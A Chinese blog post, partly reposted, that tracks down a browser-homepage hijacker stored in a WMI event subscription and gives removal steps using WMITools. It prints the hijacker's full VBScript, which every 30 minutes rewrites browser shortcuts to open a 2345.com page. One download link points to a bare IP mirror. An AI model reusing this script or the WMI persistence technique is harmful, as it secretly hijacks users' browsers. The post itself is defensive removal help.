使用电脑一直比较注意程序的安装，安装程序都会十分小心，前段时间重新安装win10后，回想了下安装的程序中同时结合网上搜索原因分析，应该为用网上下载的小马激活工具使用的时候，埋下了坏种子。

作为我们这些眼里揉不进沙子的人士，一定要想办法彻底清除掉，彻底卸载firefox，重新安装后问题依旧。当然重新安装OS是能解决问题，但是觉得太浪费时间，刚安装的系统，一定要找到原因否则下次中招了连续重装系统不成，要从根本上解决问题，周末在家里折腾了下，找到了以下解决方法。

以下是转载，感谢无私分享的Iter，记录下解决问题的办法，懒得自己截图了

【http://blog.sina.com.cn/s/blog_8be14f360102vyrc.html】

不管什么浏览器打开都是 http://hao.169x.cn/?v=108

​对于这个我的方法是 :

​1.下载wmi tool,(微软官网下载,我的下载地址是: http://120.52.73.52/download.microsoft.com/download/.NetStandardServer/Install/V1.1/NT5XP/EN-US/WMITools.exe)

2.安装好之后,打开按照下面的图片操作​

这是一个文本编辑器sublime text, 我只是把脚本复制到里面方便看脚本内容

有3个地方我框起来了了, 大概就知道是做什么的了吧

​f*u*c*k hao123

接下来就是把那条更改主页的脚本删除了

​​​​​​​​​​​_EventFilter.Name="VBScript_Kids_filter" 右键选择delete instance(删除实例)

别忘了把链接修复回来​,

我演示修复ie的, chrome(国内的浏览器都是基于chrome的), firfox,safari等浏览器类似

把红框内的东西删除

删除之后的效果

​有一外国人问我,中国盛产什么,我想了半天:"流氓软件!"​,

都是360那臭流氓把国内的软件教坏的, 又没人管理, 典型的劣币驱逐良币

推荐火绒剑,我就是通过或火绒剑的监控发现和scrcons.exe有关, 再发现还有其他相似的情况, 找到了http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html 这篇文章 发现红外wmi有关, 然后就找到了哪个东西

本文参考:

【http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html ​​】

再把原创文章转过来：

某日，因想下载verycd.com的资源，搜索到一个verycd链接查看器（具体原因不表，你懂），结果就真得吃了苍蝇了！……

既无法查到下载链接，直接将之删除。然而发现，再打开浏览器就被直接跳转到 http://www.2345.com/页面了，而且打开多个浏览器：Chrome, Firefox, Opera, Safari, iexplorer, maxthon，均相同症状，检查浏览器首页设置——均正常！

最后发现，原来快速启动栏的快捷命令被其修改，修改后的类似如下：

"C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.2345.com/?kunown

于是认为就是普通的修改快捷方式，手工删除“http://www.2345.com/?kunown”部分。但好景不长，半小时后再次被更改了，这才认定——系统被蛀了~！

本机安装有norton，未检出问题。

又安装了超级兔子、360、exterminateit等工具进行检查，也未检出……，果断将其全部卸载……（超级兔子卸载后发现还留有其自带浏览器垃圾未删除！！！真够垃圾~！手工将其卸载，不多赘述！）

打开ProcessMonitor进行监视，发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令，然后自动关闭（幸亏是30分钟一次，你要是24小时一次，那我就杯具了……），修改win7下opera快速启动图标路径类似如下：

C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk

查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。

要查看WMI事件，到以下地址下载WMITool并安装，

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root\subscription”，确定，出现下图：

点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsumer Name="unown"，选择view instant properties，如下图：

查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“http://www.2345.com/?kunown”！抓住你了~！隐藏的够深，没常驻进程，没有文件（把自己存储在WMI数据库中），靠~！

受到影响的浏览器有（各色浏览器，差不多齐了）：

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具体代码如下：

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后，清除方法：在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除！

删不掉？

到WMITool安装路径（例如：C:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！删之！

还没完，还要手动将快速启动栏中，将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉！

暂时就这么多了，还有没有其它影响的话，用用再看吧！

嗯，好歹这苍蝇到底还是吐出去了！